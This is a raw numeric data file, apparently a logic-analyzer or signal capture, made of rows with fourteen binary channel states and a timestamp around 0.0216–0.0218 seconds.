0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1635372e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1635380e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1635400e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1635424e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1635448e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1635476e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1635500e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1635524e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1635532e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1635572e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1635600e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1635652e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1635676e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1635724e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1635748e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1635756e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1635772e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1635800e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1635804e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1635824e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1635848e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1635852e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1635876e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1635900e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1635908e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1635948e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1635972e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1636024e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1636052e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1636100e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1636124e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1636172e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1636200e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1636204e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1636224e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1636252e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1636256e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1636276e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1636300e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1636304e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1636348e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1636372e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1636380e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1636400e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1636424e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1636448e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1636476e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1636500e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1636524e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1636548e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1636572e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1636580e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1636624e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1636652e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,2.1636656e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1636660e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1636676e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1636700e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1636724e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1636748e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1636772e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1636796e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1636824e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1636852e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1636876e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1636900e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1636924e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1636948e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1636972e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1637000e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1637024e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1637048e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1637076e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1637100e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1637148e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1637172e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1637224e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1637252e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1637300e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1637324e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1637332e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1637372e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1637400e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1637452e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1637476e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1637500e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1637524e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1637528e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1637548e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1637572e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1637580e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1637624e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1637652e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1637700e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1637724e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1637772e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1637800e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1637852e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1637876e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1637880e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1637900e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1637924e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1637932e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1637948e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1637972e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1637996e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1638024e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1638028e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1638048e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1638076e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,2.1638080e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1638084e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1638124e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1638148e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1638200e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1638224e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1638276e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1638300e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1638304e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1638324e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1638348e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1638356e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1638372e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1638396e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1638424e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1638452e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1638476e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1638500e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1638524e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1638548e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1638572e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1638596e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1638624e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1638652e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1638676e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1638700e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1638724e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1638748e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1638756e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1638772e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1638800e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1638804e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1638852e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1638876e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1638924e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1638948e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1639000e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1639024e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1639076e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1639100e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1639104e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1639124e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1639148e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1639156e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1639172e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1639200e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1639204e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1639224e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1639252e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1639256e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1639300e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1639324e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1639372e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1639396e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1639448e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1639472e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1639524e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1639548e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1639552e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1639572e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1639596e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1639604e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1639620e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1639652e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1639672e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1639696e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1639724e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1639748e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1639772e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1639796e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1639820e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1639852e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1639872e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1639896e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1639924e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1639948e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1639972e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1639996e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1640020e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1640048e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1640072e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1640096e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1640124e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1640148e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1640172e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1640196e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1640220e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1640244e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1640272e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1640296e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1640324e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1640348e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1640372e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1640396e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1640420e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1640444e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1640472e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1640496e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1640524e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1640548e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1640572e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1640596e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1640620e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1640644e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1640672e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1640696e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1640724e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1640748e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1640772e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1640796e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1640820e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1640844e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1640872e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1640896e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1640924e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1640948e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1640972e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1640996e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1641020e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1641044e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1641072e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1641096e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1641124e-02 0,0,1,0,1,0,0,0,0,1,0,0,0,0,2.1641148e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1641152e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,1,2.1764972e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,2.1765156e-02 1,0,1,0,1,1,0,0,0,1,0,1,0,1,2.1765188e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,2.1765212e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,2.1765492e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,2.1765528e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,2.1765552e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,2.1765572e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,2.1765596e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,2.1765620e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,2.1765644e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,2.1765672e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,2.1765696e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,2.1765724e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,2.1765748e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,2.1765772e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,1,2.1765780e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,1,2.1765796e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1765808e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1765820e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1765848e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1765872e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1765876e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1765900e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1765924e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1765948e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1765972e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1765996e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1766020e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1766044e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1766072e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1766096e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1766124e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1766128e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1766148e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1766172e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1766196e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1766220e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1766228e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1766244e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1766272e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1766296e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1766324e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1766348e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1766372e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1766396e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1766420e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1766428e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1766444e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1766472e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1766496e-02 1,0,1,0,1,0,0,0,0,1,0,0,0,0,2.1766524e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1766528e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1766548e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1766572e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1766580e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1766596e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1766620e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1766644e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1766672e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1766696e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1766724e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1766748e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1766772e-02 1,0,1,0,1,0,0,0,0,1,0,0,0,0,2.1766776e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1766780e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1766796e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1766820e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1766828e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1766844e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1766872e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1766896e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1766924e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1766948e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1766972e-02 1,0,1,0,1,0,0,0,0,1,0,0,0,0,2.1766976e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1766980e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1766996e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1767020e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1767044e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1767072e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1767096e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1767124e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1767128e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1767148e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1767172e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1767196e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1767220e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1767244e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1767272e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1767276e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1767296e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1767324e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1767348e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1767372e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1767396e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1767420e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1767444e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1767472e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1767476e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1767496e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1767524e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1767548e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1767572e-02 1,0,1,0,1,0,0,0,0,1,0,0,0,0,2.1767576e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1767580e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1767596e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1767620e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1767628e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1767644e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1767672e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1767696e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1767724e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1767748e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1767772e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1767796e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1767820e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1767828e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1767844e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1767872e-02 1,0,1,0,1,1,0,0,0,0,0,0,0,0,2.1767876e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1767880e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1767896e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1767924e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1767972e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1767996e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1768048e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1768072e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1768124e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1768148e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1768196e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1768220e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1768272e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1768300e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1768348e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1768372e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1768396e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1768420e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1768444e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1768472e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1768476e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1768496e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1768524e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1768548e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1768572e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1768596e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1768620e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1768644e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1768672e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1768696e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1768724e-02 1,0,1,0,1,1,0,0,0,0,0,0,0,0,2.1768728e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1768732e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1768748e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1768772e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1768796e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1768820e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1768828e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1768844e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1768872e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1768896e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1768924e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1768948e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1768972e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,2.1768996e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,2.1769020e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1769028e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1769044e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,2.1769072e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,2.1769096e-02 